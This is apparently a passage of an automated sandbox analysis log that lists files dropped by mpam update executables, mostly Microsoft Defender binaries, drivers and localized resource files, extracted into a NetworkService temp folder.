Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ar-SA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\as-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\es-ES\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\vi-VN\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\el-GR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\quz-PE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\Drivers\WdBoot.sys Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\gd-GB\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\it-IT\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\nl-NL\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\sl-SI\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ta-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ko-KR\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\lo-LA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MsMpLics.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\fi-FI\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\nb-NO\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\zh-TW\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\sr-Latn-RS\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpCmdRun.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\en-US\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\bs-Latn-BA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpEvMsg.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\hi-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\sv-SE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpUpdate.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\af-ZA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ne-NP\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\fi-FI\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\lv-LV\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\cy-GB\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\bn-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ar-SA\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\et-EE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\fr-FR\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\endpointdlp.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ja-JP\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\tt-RU\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\tr-TR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSvc.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\x86\MpCmdRun.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\hu-HU\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\sr-Cyrl-RS\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\mpextms.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\cs-CZ\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\nb-NO\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\Drivers\WdNisDrv.sys Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\x86\MpAsDesc.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\cs-CZ\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\pl-PL\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\fil-PH\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\it-IT\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\th-TH\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\nl-NL\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\nb-NO\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\kok-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\mk-MK\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\zh-CN\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\en-GB\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\lt-LT\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\zh-TW\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\el-GR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\lb-LU\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\kk-KZ\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpClient.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\x86\endpointdlp.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\fa-IR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\zh-TW\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ProtectionManagement.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\hr-HR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ru-RU\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\he-IL\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\bg-BG\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\es-MX\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpDetours.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\id-ID\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\mr-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ConfigSecurityPolicy.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\nn-NO\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\zh-CN\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpAsDesc.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ca-ES\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\hu-HU\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\sr-Cyrl-BA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\zh-TW\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\zh-CN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\Drivers\WdFilter.sys Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ja-JP\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\pt-BR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\az-Latn-AZ\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\fi-FI\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\pt-BR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\sv-SE\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ca-ES-valencia\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\en-GB\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\vi-VN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpDlpCmd.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\es-ES\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\zh-CN\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\fr-FR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\pt-PT\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ja-JP\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\de-DE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\en-US\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\sq-AL\mpuxagent.dll.mui Jump to dropped file
